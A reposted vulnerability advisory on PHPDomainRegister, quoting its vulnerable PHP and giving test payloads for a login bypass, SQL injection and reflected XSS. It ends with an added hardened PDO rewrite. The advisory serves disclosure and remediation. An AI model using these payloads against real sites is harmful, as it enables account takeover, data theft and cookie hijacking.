
PHPDomainRegister v0.4a-RC2-dev: Multiple Flaws and Fixes

Source: 自学PHP网    Date: 2015-04-17 13:03


Title: PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author: Or4nG.M4n
Download: http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar
Thanks:
+----------------------------------+
|   xSs m4n i-Hmx Cyber-Crystal    |
|   Dr.Bnned ahwak2000 sa^Dev!L    |
+----------------------------------+
 
                                       SQL Auth Bypass
Vulnerable location: class_AjaxLogin.php line 73
 
  function is_login() {
      include ('../config.php');
      if (isset($_POST['username'])) {
          // The POSTed username goes into the session and, unescaped, into the query
          $_SESSION['username'] = $_POST['username'];
          $password = $_POST['password'];
          // Both values are concatenated straight into the SQL string
          $strSQL =
              "SELECT
                      *
              FROM
                      `".$_SQL_PREFIX . $USER_Table_Name."`
              WHERE
                      `LOGIN_NAME` = '".$_SESSION['username']."'
              AND
                      password = md5('".$password."');";

          $result = mysql_query($strSQL);
          $row    = mysql_fetch_row($result);
          $exist  = count($row);
          // Any returned row counts as a successful login
          if ($exist >= 2) { $this->jscript_location(); }
      }
  }

  // jscript_location(), called on success:

  function jscript_location() {
      $this->set_session();
      echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>";
  }
  
 
Test method:
Log in with the username: admin ' or 1=1 #
 
                                      SQL injection
Vulnerable location:
admin/index.php line 212
 
// $_GET['pid'] is concatenated into the query without validation or escaping
$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";";
$getpack = mysql_query($sql);
 
line 1079
 
        showPacket($pid);
                                  
Vulnerable code:
index.php line 617
 
    // Same pattern: $_GET['pid'] is appended directly to the SQL string
    $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid']."";
    $result = mysql_query($SQL);
Test method:
http://www.2cto.com/index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere%   (SQL injection to XSS to get the cookie)
 
 
                                     Cross Site Scripting [XSS]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>
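
A hardened counterpart to the three patterns above, as an added example that is not part of the advisory or of PHPDomainRegister's code. The table name "users", the helper names and the sample rows are assumptions; it uses PDO with bound parameters and password_hash()/password_verify() in place of the original mysql_query() and md5().

```php
<?php
// Added example, not PHPDomainRegister code. Table name "users" and the helper
// names are assumptions; LOGIN_NAME, password and packages.id are from the excerpts.
$db = new PDO('sqlite::memory:');   // constructed in-memory data so this runs offline
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (LOGIN_NAME TEXT PRIMARY KEY, password TEXT)');
$db->exec('CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT, price REAL)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['admin', password_hash('S3cret-sample', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO packages VALUES (1, 'Starter', 4.99)");

// Login: the username is bound as data and the hash is verified in PHP,
// so a crafted username is only ever compared as a literal string.
function check_login(PDO $db, string $user, string $pass): bool {
    $st = $db->prepare('SELECT password FROM users WHERE LOGIN_NAME = ?');
    $st->execute([$user]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// pid: accept only a positive integer, then still bind it as a parameter.
function get_package(PDO $db, $pid): ?array {
    $id = filter_var($pid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $st = $db->prepare('SELECT name, price FROM packages WHERE id = ?');
    $st->execute([$id]);
    return $st->fetch(PDO::FETCH_ASSOC) ?: null;
}

// domain: encode on output so markup in the parameter is rendered as text.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: a valid login, the advisory's test username, a valid pid,
// a non-integer pid, and the advisory's domain value.
var_dump(check_login($db, 'admin', 'S3cret-sample'));
var_dump(check_login($db, "admin ' or 1=1 #", 'x'));
var_dump(get_package($db, '1'));
var_dump(get_package($db, '1 OR 1=1'));
echo h('<script>alert(7);</script>'), "\n";
```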
